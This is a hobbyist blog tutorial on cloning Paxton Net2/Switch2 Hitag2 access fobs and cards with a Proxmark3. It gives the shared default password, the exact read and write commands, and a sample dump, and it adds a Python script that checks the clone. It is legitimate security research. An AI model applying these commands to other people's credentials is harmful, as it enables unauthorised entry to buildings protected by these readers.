Badcfe.org - too small to not fail

How to copy, read and write Paxton fobs and cards with a Proxmark

Paxton fobs and readers are popular in the UK, especially the Net2 system, where the fobs look like this with a blue ring:


Green rings on the fob usually denote a slightly different system called Switch2, which is not networked and is programmed with fobs or cards themselves. These fobs can also be copied using this guide.

Paxton readers often look like this:


Paxton systems can also use cards, sometimes with a magnetic stripe, sometimes without.

This guide covers how to read the data from an existing Paxton fob or card and also how to write data to a fob or card. If the original fob or card has been authorised with the reader, the new fob or card will be seen by the reader as the same tag, effectively a clone. You can copy cards to fobs and fobs to cards. Hereafter both fobs and cards will be referred to as tags.

These original Paxton tags use hitag2 technology and so can be copied to any hitag2 cards, fobs or other tag form factor.

Equipment used

Reading the tag

I'm going to assume you have already connected to your proxmark3. If not, there are some guides here.

Paxton fobs are password protected, but the password is the same for all fobs and readers: the hex string 0xBDF5E846.

So to read our fob we just place the fob or card on the reader.


We can then do:

[usb] pm3 --> lf hitag read --21 -k BDF5E846
[+]  UID: 466d9713

[=] Hitag2 tag information 

[=] ------------------------------------
[+] Config byte : 0x06 [ 00000110 ]
[+] Encoding    : Manchester
[+] Version     : Hitag2
[+] Coding in HITAG 2 operation: manchester
[+] Tag is in   : Password mode
[+] Page 6,7    : RW
[+] Page 4,5    : RW
[+] Page 3      : RW
[+] Page 1,2    : RW
[=] ------------------------------------
[=] 00 | 46 6D 97 13 | Fm..
[=] 01 | BD F5 E8 46 | ...F
[=] 02 | 20 F0 4F 4E |  .ON
[=] 03 | 06 F9 07 C2 | ....
[=] 04 | 9D AD 91 08 | ....
[=] 05 | B0 BF 00 03 | ....
[=] 06 | 00 30 00 06 | .0..
[=] 07 | 75 EB 00 10 | u...
[=] 08 | 00 00 00 00 | ....
[=] 09 | 00 00 00 00 | ....
[=] 10 | 00 00 00 00 | ....
[=] 11 | 00 00 00 00 | ....
[=] -------- Possible de-scramble patterns ---------
[+] Paxton id: 36692262 | 0x22fe126

This is a dump of all the data held on a Paxton fob. The data is made up of 12 pages of 4 bytes. However, only pages 4 and 5 are used to hold the data that identifies the tag to the reader. What are the other pages? The first 4 pages are config data and passwords. You can read more about the hitag2 tags here.

Copying to a new hitag2 card or fob

We only need to copy the relevant pages to our new tag. Take a note of the hex code for pages 4 and 5. Then swap the tag on the proxmark and write to the new tag.

lf hitag writer --27 -k BDF5E846 -p 4 -d 9DAD9108
lf hitag writer --27 -k BDF5E846 -p 5 -d B0BF0003

Checking the new tag

The write command can be a bit error prone [1], so it is worth reading back the tag you just wrote to and checking that the correct values were written, with:

[usb] pm3 --> lf hitag read --21 -k BDF5E846
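
The read-back check can be done by comparing the page lines of the two dumps rather than by eye. The following is an added example, not part of the original guide or of the Proxmark project: the function names are hypothetical, the source lines are taken from the dump above, and the read-back dump is constructed to show a failed write to page 5.

```python
import re

# Matches pm3 page lines such as "[=] 04 | 9D AD 91 08 | ...."
PAGE_LINE = re.compile(
    r"^\[=\]\s+(\d{2})\s+\|\s+((?:[0-9A-Fa-f]{2}\s+){3}[0-9A-Fa-f]{2})\s+\|")

# Pages the guide says identify the tag to the reader.
ID_PAGES = (4, 5)


def parse_dump(text):
    """Return {page_number: 4 bytes} from 'lf hitag read' output."""
    pages = {}
    for line in text.splitlines():
        m = PAGE_LINE.match(line.strip())
        if m:
            pages[int(m.group(1))] = bytes.fromhex("".join(m.group(2).split()))
    return pages


def compare_id_pages(source, clone, pages=ID_PAGES):
    """List problems found; an empty list means the pages match."""
    problems = []
    for p in pages:
        if p not in source or p not in clone:
            problems.append(f"page {p}: missing from a dump (read failed?)")
        elif source[p] != clone[p]:
            problems.append(f"page {p}: expected {source[p].hex().upper()}, "
                            f"got {clone[p].hex().upper()}")
    return problems


# Page lines copied from the dump shown in this guide.
SOURCE = """\
[=] 03 | 06 F9 07 C2 | ....
[=] 04 | 9D AD 91 08 | ....
[=] 05 | B0 BF 00 03 | ....
"""
# Constructed read-back where the write to page 5 did not take.
READBACK = """\
[=] 03 | 06 F9 07 C2 | ....
[=] 04 | 9D AD 91 08 | ....
[=] 05 | 00 00 00 00 | ....
"""

if __name__ == "__main__":
    for problem in compare_id_pages(parse_dump(SOURCE), parse_dump(READBACK)):
        print(problem)
```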

Getting hold of hitag2 tags

This is actually one of the harder steps, especially with hitag2 cards in smaller quantities. A lot of what are advertised as hitag2 cards turn out, when they arrive, to be a different card type such as EM4100. In the course of this research I ended up with a load of tags of many types.

Paxton fobs can be widely picked up in packs of 10 for about £30, but this is much more than a hitag2 card should cost, which is less than half that.

If you want to give this guide a go I have a small quantity of genuine Paxton fobs I purchased and would be willing to sell individually for around cost price. If you would like one of these contact me via github. Also happy to clone tags for research.

  1. Update: this issue should be fixed now. Try downloading and building the latest firmware for the proxmark.